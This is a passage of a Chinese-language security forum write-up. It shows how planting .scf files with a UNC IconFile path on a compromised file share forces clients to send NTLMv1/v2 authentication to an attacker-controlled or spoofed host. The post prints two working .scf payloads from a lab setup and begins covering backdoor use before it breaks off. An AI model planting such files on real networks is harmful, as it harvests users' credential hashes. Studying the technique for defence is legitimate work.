0x00 前言

      本篇文章是基于w师傅利用图标文件获取连接文件服务器的NTLMv2 Hash文章,整理的一篇分类更加详细更加细致的总结!
      在我上篇文章《监听445端口抓v2数据》中其实有一个问题不知道大家也没有注意?

我们只需要抓取445端口的相关认证信息即可,但是这里有一个问题。就是之前认证成功的用户再来访问我们的时候是不会再次认证的,所以我们获取不了。

      我遇到的情况中很多都是这样的,人家已经可以访问我了,这个时候是不能获取不到认证的NTLM v1\v2 Hash的!这时候就需要使用其他方法来获取了!

      通过抓取自己445端口能够获取未认证用户的v1\v2 Hash,但是想要获取已经能够登录SMB服务账户的NTLM v1\v2 Hash,需要我们再任意获取一台win2012 win7以上的机器,使用445的方法再去监听端口!或者一台PY版本2.7.1 以上的linux。而让客户端用户访问另一台未认证机器的过程就是下面所介绍的!

0x01 简介

接下来主要介绍这些内容:

  • 添加scf文件强制用户访问伪造的文件服务器
  • 修改文件夹图标强制用户访问伪造的文件服务器

      在这里测试如上的所有方法,读者可以根据自己的情况来选择使用哪种方式进行攻击!

0x02 scf文件简介

      scf文件是"WINDOWS资源管理器命令"文件,是一种可执行文件。里面存在一个lconFile属性,可以填写UNC路径。利用这一点可以重定向配合我们的攻击,原作者文章中原理部分已经很清楚了,就是使用文档管理器访问会执行这个.scf文件。
      因原作者只实验了我思路中的一种,所以我在这里根据我的思路弄一个完整的!

0x03 增加scf文件强制访问用户访问伪造的文件服务器

测试环境:

已控”文件”服务器IP:192.168.20.3 2008
陷阱服务器IP:192.168.20.141 win7 数据查看方式使用wireshark,实验过程用win自带抓包过于麻烦
客户端IP:192.168.20.2 2012 已经能够直接登录“文件”服务器

实验目的:

      通过让客户端访问“文件”服务器,从而强制让它访问陷阱机器来获取NTLM v2\v1的认证数据!

实验方法:

      让客户端访问已控制文件服务器,随后用scf文件进行重定向到陷阱服务器

实验过程:

      在“文件”服务器(192.168.20.3)上放入test.scf,文件内容如下。192.168.20.141为陷阱服务器IP

[Shell]
Command=2
IconFile=\\192.168.20.141\SYS\test.ico
[Taskbar]
Command=ToggleDesktop

      已在共享文档里放入了这个文件

      192.168.20.141为我们的陷阱服务器,打开wireshark进行监听(真实环境就是使用netsh中的trace功能来实现)

      让我们的客户端(192.168.20.2)访问"文件"服务器(192.168.20.3)

      可以在陷阱服务器上看到了来自客户端的请求认证信息!

      这样就可以成功获取认证用户的NTLM v1\v2 Hash了!

0x04 增加scf文件强制访问未知目标

      在这里脑子活络的朋友肯定已经想到能否使用SMB欺骗呢?这里也是可以的,这样的方式无法解析,从而广播让我们监听欺骗到!让我们来试验一下!

测试环境:

      欺骗机器用linux : 192.168.20.131 Kali代替
      已控”文件”服务器IP:192.168.20.3 2008
      客户端IP:192.168.20.2 2012

实验目的:

      通过让客户端访问“文件”服务器,从而强制让它访问不存在目标,从而进行广播被我们NTLM欺骗抓到NTLM v1\v2 HASH!

实验方法:

      让客户端访问已控制文件服务器,随后用scf文件进行重定向到不存在的目标,如:asdasdasd

实验过程:
      已控”文件”服务器上已经放置test.scf文件,其中内容修改成如下信息

[Shell]
Command=2
IconFile=\\asdasdasd\SYS\test.ico
[Taskbar]
Command=ToggleDesktop

      欺骗机器Kali上先开启监听

      客户端访问"文件"服务器

      这时候你就能在Kali的服务器上获取到NTLM v1\v2 Hash了!


0x05 增加scf文件当作本机后门

      那是否可以设置成单独的后门呢?如拿下了A机器,使用如上2种方法去设置。当用户打开本机文件夹时我们能否收到呢?

测试环境:

(1)测试SMB欺骗

点击收藏 | 4 关注 | 4
登录 后跟帖